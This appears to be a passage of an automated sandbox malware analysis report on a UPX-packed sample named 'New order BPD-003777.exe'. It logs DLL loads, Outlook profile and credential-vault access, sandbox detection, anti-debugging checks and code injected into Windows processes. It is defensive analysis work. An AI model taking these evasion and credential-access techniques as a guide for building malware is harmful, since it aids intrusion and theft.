Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\YCRIsUHDWrNbkRXMzeGcsahUMUSqSnoZrCZzdnRxqtNSRtuRWWmlapICLWWtbkGMMOPQbB\xTzxorEdKnFN.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\YCRIsUHDWrNbkRXMzeGcsahUMUSqSnoZrCZzdnRxqtNSRtuRWWmlapICLWWtbkGMMOPQbB\xTzxorEdKnFN.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\YCRIsUHDWrNbkRXMzeGcsahUMUSqSnoZrCZzdnRxqtNSRtuRWWmlapICLWWtbkGMMOPQbB\xTzxorEdKnFN.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\YCRIsUHDWrNbkRXMzeGcsahUMUSqSnoZrCZzdnRxqtNSRtuRWWmlapICLWWtbkGMMOPQbB\xTzxorEdKnFN.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\YCRIsUHDWrNbkRXMzeGcsahUMUSqSnoZrCZzdnRxqtNSRtuRWWmlapICLWWtbkGMMOPQbB\xTzxorEdKnFN.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\YCRIsUHDWrNbkRXMzeGcsahUMUSqSnoZrCZzdnRxqtNSRtuRWWmlapICLWWtbkGMMOPQbB\xTzxorEdKnFN.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\colorcpl.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\colorcpl.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: New order BPD-003777.exe

Static file information: File size 1178112 > 1048576

Source:	Binary string: colorcpl.pdbGCTL source: svchost.exe, 00000001.00000003.2241213497.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2241288175.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2241307300.0000000002C2F000.00000004.00000020.00020000.00000000.sdmp, xTzxorEdKnFN.exe, 00000005.00000002.3629196408.0000000000E78000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: colorcpl.pdb source: svchost.exe, 00000001.00000003.2241213497.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2241288175.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2241307300.0000000002C2F000.00000004.00000020.00020000.00000000.sdmp, xTzxorEdKnFN.exe, 00000005.00000002.3629196408.0000000000E78000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: xTzxorEdKnFN.exe, 00000005.00000002.3629049405.0000000000C7E000.00000002.00000001.01000000.00000005.sdmp, xTzxorEdKnFN.exe, 00000007.00000002.3629749593.0000000000C7E000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: New order BPD-003777.exe, 00000000.00000003.1773914994.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, New order BPD-003777.exe, 00000000.00000003.1777371053.0000000003F60000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2184369007.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2272638847.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2186183627.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2272638847.000000000339E000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000006.00000002.3630083758.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000006.00000003.2277328043.00000000049B9000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000006.00000003.2272230690.000000000480A000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000006.00000002.3630083758.0000000004B60000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: New order BPD-003777.exe, 00000000.00000003.1773914994.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, New order BPD-003777.exe, 00000000.00000003.1777371053.0000000003F60000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.2184369007.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2272638847.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2186183627.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2272638847.000000000339E000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, colorcpl.exe, 00000006.00000002.3630083758.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000006.00000003.2277328043.00000000049B9000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000006.00000003.2272230690.000000000480A000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000006.00000002.3630083758.0000000004B60000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: colorcpl.exe, 00000006.00000002.3630401859.000000000518C000.00000004.10000000.00040000.00000000.sdmp, colorcpl.exe, 00000006.00000002.3628717504.0000000002DBD000.00000004.00000020.00020000.00000000.sdmp, xTzxorEdKnFN.exe, 00000007.00000002.3630102556.000000000279C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2562375462.000000001F3DC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: colorcpl.exe, 00000006.00000002.3630401859.000000000518C000.00000004.10000000.00040000.00000000.sdmp, colorcpl.exe, 00000006.00000002.3628717504.0000000002DBD000.00000004.00000020.00020000.00000000.sdmp, xTzxorEdKnFN.exe, 00000007.00000002.3630102556.000000000279C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2562375462.000000001F3DC000.00000004.80000000.00040000.00000000.sdmp

Source: C:\Users\user\Desktop\New order BPD-003777.exe

Code function: 0_2_002842DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_002842DE

Source: C:\Users\user\Desktop\New order BPD-003777.exe	Code function: 0_2_0028832D push edi; retn 0000h	0_2_0028832F
Source: C:\Users\user\Desktop\New order BPD-003777.exe	Code function: 0_2_002A5474 push dword ptr [eax+esi+3Bh]; iretd	0_2_002A5481
Source: C:\Users\user\Desktop\New order BPD-003777.exe	Code function: 0_2_002A0A76 push ecx; ret	0_2_002A0A89
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00714879 push ecx; retf	1_2_0071487A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0071E8AB push ss; ret	1_2_0071E8BB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_007118AA pushfd ; retf	1_2_007118B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00714AE4 push esp; iretd	1_2_00714BDA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00714B60 push esp; iretd	1_2_00714BDA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00703330 push eax; ret	1_2_00703332
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00714B33 push esp; iretd	1_2_00714BDA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00714BDB push esp; iretd	1_2_00714BDA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_007143AE push cs; iretd	1_2_0071435D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0070D41C push ecx; iretd	1_2_0070D425
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00701CE1 push cs; ret	1_2_00701CE5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_007185DF push esi; ret	1_2_007185E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_007145B0 pushfd ; ret	1_2_007145B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0071A6F7 push eax; ret	1_2_0071A6F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00701EDF push cs; iretd	1_2_00701EDE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00701EDF push cs; iretd	1_2_00701F0A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00701EA2 push cs; iretd	1_2_00701EDE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00708682 push eax; ret	1_2_00708690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00715F61 push ds; retf	1_2_00715FC1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00701F0B push cs; iretd	1_2_00701F0A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00715FA3 push ds; retf	1_2_00715FC1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0070D791 push es; ret	1_2_0070D792
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0320225F pushad ; ret	1_2_032027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032027FA pushad ; ret	1_2_032027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032309AD push ecx; mov dword ptr [esp], ecx	1_2_032309B6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0320283D push eax; iretd	1_2_03202858
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0320135E push eax; iretd	1_2_03201369
Source: C:\Program Files (x86)\YCRIsUHDWrNbkRXMzeGcsahUMUSqSnoZrCZzdnRxqtNSRtuRWWmlapICLWWtbkGMMOPQbB\xTzxorEdKnFN.exe	Code function: 5_2_034BB37A pushfd ; retf	5_2_034BB383

Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1

Source: C:\Users\user\Desktop\New order BPD-003777.exe

Code function: 0_2_0029F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

0_2_0029F98E

Source: C:\Users\user\Desktop\New order BPD-003777.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\New order BPD-003777.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found API chain indicative of sandbox detection

Source: C:\Users\user\Desktop\New order BPD-003777.exe

Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep

graph_0-33294

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\New order BPD-003777.exe	API/Special instruction interceptor: Address: 146E39C
Source: C:\Windows\SysWOW64\colorcpl.exe	API/Special instruction interceptor: Address: 7FFE2220D324
Source: C:\Windows\SysWOW64\colorcpl.exe	API/Special instruction interceptor: Address: 7FFE2220D7E4
Source: C:\Windows\SysWOW64\colorcpl.exe	API/Special instruction interceptor: Address: 7FFE2220D944
Source: C:\Windows\SysWOW64\colorcpl.exe	API/Special instruction interceptor: Address: 7FFE2220D504
Source: C:\Windows\SysWOW64\colorcpl.exe	API/Special instruction interceptor: Address: 7FFE2220D544
Source: C:\Windows\SysWOW64\colorcpl.exe	API/Special instruction interceptor: Address: 7FFE2220D1E4
Source: C:\Windows\SysWOW64\colorcpl.exe	API/Special instruction interceptor: Address: 7FFE22210154
Source: C:\Windows\SysWOW64\colorcpl.exe	API/Special instruction interceptor: Address: 7FFE2220DA44

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 1_2_0327096E rdtsc

1_2_0327096E

Source: C:\Users\user\Desktop\New order BPD-003777.exe	API coverage: 9.4 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 0.6 %
Source: C:\Windows\SysWOW64\colorcpl.exe	API coverage: 2.6 %

Source: C:\Windows\SysWOW64\colorcpl.exe TID: 8108	Thread sleep count: 39 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe TID: 8108	Thread sleep time: -78000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\YCRIsUHDWrNbkRXMzeGcsahUMUSqSnoZrCZzdnRxqtNSRtuRWWmlapICLWWtbkGMMOPQbB\xTzxorEdKnFN.exe TID: 8136	Thread sleep time: -55000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\YCRIsUHDWrNbkRXMzeGcsahUMUSqSnoZrCZzdnRxqtNSRtuRWWmlapICLWWtbkGMMOPQbB\xTzxorEdKnFN.exe TID: 8136	Thread sleep time: -34500s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\colorcpl.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\colorcpl.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\New order BPD-003777.exe	Code function: 0_2_002EDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,		0_2_002EDBBE
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_029CC5A0 FindFirstFileW,FindNextFileW,FindClose,		6_2_029CC5A0

Source: C:\Users\user\Desktop\New order BPD-003777.exe

Code function: 0_2_002842DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_002842DE

Source: colorcpl.exe, 00000006.00000002.3628717504.0000000002DBD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll!
Source: firefox.exe, 00000008.00000002.2563765922.000002D71F48C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: xTzxorEdKnFN.exe, 00000007.00000002.3629259364.000000000093F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllvv

Source: C:\Users\user\Desktop\New order BPD-003777.exe

API call chain: ExitProcess graph end node

graph_0-33786

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 1_2_0327096E rdtsc

1_2_0327096E

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 1_2_00717823 LdrLoadDll,

1_2_00717823

Source: C:\Users\user\Desktop\New order BPD-003777.exe

Code function: 0_2_002B2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_002B2622

Source: C:\Users\user\Desktop\New order BPD-003777.exe

Code function: 0_2_002842DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_002842DE

Source: C:\Users\user\Desktop\New order BPD-003777.exe	Code function: 0_2_002A4CE8 mov eax, dword ptr fs:[00000030h]	0_2_002A4CE8
Source: C:\Users\user\Desktop\New order BPD-003777.exe	Code function: 0_2_0146CFA8 mov eax, dword ptr fs:[00000030h]	0_2_0146CFA8
Source: C:\Users\user\Desktop\New order BPD-003777.exe	Code function: 0_2_0146E668 mov eax, dword ptr fs:[00000030h]	0_2_0146E668
Source: C:\Users\user\Desktop\New order BPD-003777.exe	Code function: 0_2_0146E608 mov eax, dword ptr fs:[00000030h]	0_2_0146E608
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03308324 mov eax, dword ptr fs:[00000030h]	1_2_03308324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03308324 mov ecx, dword ptr fs:[00000030h]	1_2_03308324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03308324 mov eax, dword ptr fs:[00000030h]	1_2_03308324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03308324 mov eax, dword ptr fs:[00000030h]	1_2_03308324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0326A30B mov eax, dword ptr fs:[00000030h]	1_2_0326A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0326A30B mov eax, dword ptr fs:[00000030h]	1_2_0326A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0326A30B mov eax, dword ptr fs:[00000030h]	1_2_0326A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0322C310 mov ecx, dword ptr fs:[00000030h]	1_2_0322C310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03250310 mov ecx, dword ptr fs:[00000030h]	1_2_03250310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032D437C mov eax, dword ptr fs:[00000030h]	1_2_032D437C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]	1_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]	1_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]	1_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]	1_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]	1_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]	1_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]	1_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]	1_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]	1_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]	1_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]	1_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]	1_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]	1_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]	1_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]	1_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B035C mov eax, dword ptr fs:[00000030h]	1_2_032B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B035C mov eax, dword ptr fs:[00000030h]	1_2_032B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B035C mov eax, dword ptr fs:[00000030h]	1_2_032B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B035C mov ecx, dword ptr fs:[00000030h]	1_2_032B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B035C mov eax, dword ptr fs:[00000030h]	1_2_032B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B035C mov eax, dword ptr fs:[00000030h]	1_2_032B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032FA352 mov eax, dword ptr fs:[00000030h]	1_2_032FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032D8350 mov ecx, dword ptr fs:[00000030h]	1_2_032D8350
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0330634F mov eax, dword ptr fs:[00000030h]	1_2_0330634F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0322E388 mov eax, dword ptr fs:[00000030h]	1_2_0322E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0322E388 mov eax, dword ptr fs:[00000030h]	1_2_0322E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0322E388 mov eax, dword ptr fs:[00000030h]	1_2_0322E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0325438F mov eax, dword ptr fs:[00000030h]	1_2_0325438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0325438F mov eax, dword ptr fs:[00000030h]	1_2_0325438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03228397 mov eax, dword ptr fs:[00000030h]	1_2_03228397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03228397 mov eax, dword ptr fs:[00000030h]	1_2_03228397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03228397 mov eax, dword ptr fs:[00000030h]	1_2_03228397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h]	1_2_032403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h]	1_2_032403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h]	1_2_032403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h]	1_2_032403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h]	1_2_032403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h]	1_2_032403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h]	1_2_032403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h]	1_2_032403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0324E3F0 mov eax, dword ptr fs:[00000030h]	1_2_0324E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0324E3F0 mov eax, dword ptr fs:[00000030h]	1_2_0324E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0324E3F0 mov eax, dword ptr fs:[00000030h]	1_2_0324E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032663FF mov eax, dword ptr fs:[00000030h]	1_2_032663FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032EC3CD mov eax, dword ptr fs:[00000030h]	1_2_032EC3CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0323A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0323A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0323A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0323A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0323A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0323A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0323A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0323A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0323A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0323A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0323A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0323A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032383C0 mov eax, dword ptr fs:[00000030h]	1_2_032383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032383C0 mov eax, dword ptr fs:[00000030h]	1_2_032383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032383C0 mov eax, dword ptr fs:[00000030h]	1_2_032383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032383C0 mov eax, dword ptr fs:[00000030h]	1_2_032383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B63C0 mov eax, dword ptr fs:[00000030h]	1_2_032B63C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032DE3DB mov eax, dword ptr fs:[00000030h]	1_2_032DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032DE3DB mov eax, dword ptr fs:[00000030h]	1_2_032DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032DE3DB mov ecx, dword ptr fs:[00000030h]	1_2_032DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032DE3DB mov eax, dword ptr fs:[00000030h]	1_2_032DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032D43D4 mov eax, dword ptr fs:[00000030h]	1_2_032D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032D43D4 mov eax, dword ptr fs:[00000030h]	1_2_032D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0322823B mov eax, dword ptr fs:[00000030h]	1_2_0322823B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03234260 mov eax, dword ptr fs:[00000030h]	1_2_03234260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03234260 mov eax, dword ptr fs:[00000030h]	1_2_03234260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03234260 mov eax, dword ptr fs:[00000030h]	1_2_03234260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0322826B mov eax, dword ptr fs:[00000030h]	1_2_0322826B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]	1_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]	1_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]	1_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]	1_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]	1_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]	1_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]	1_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]	1_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]	1_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]	1_2_032E0274
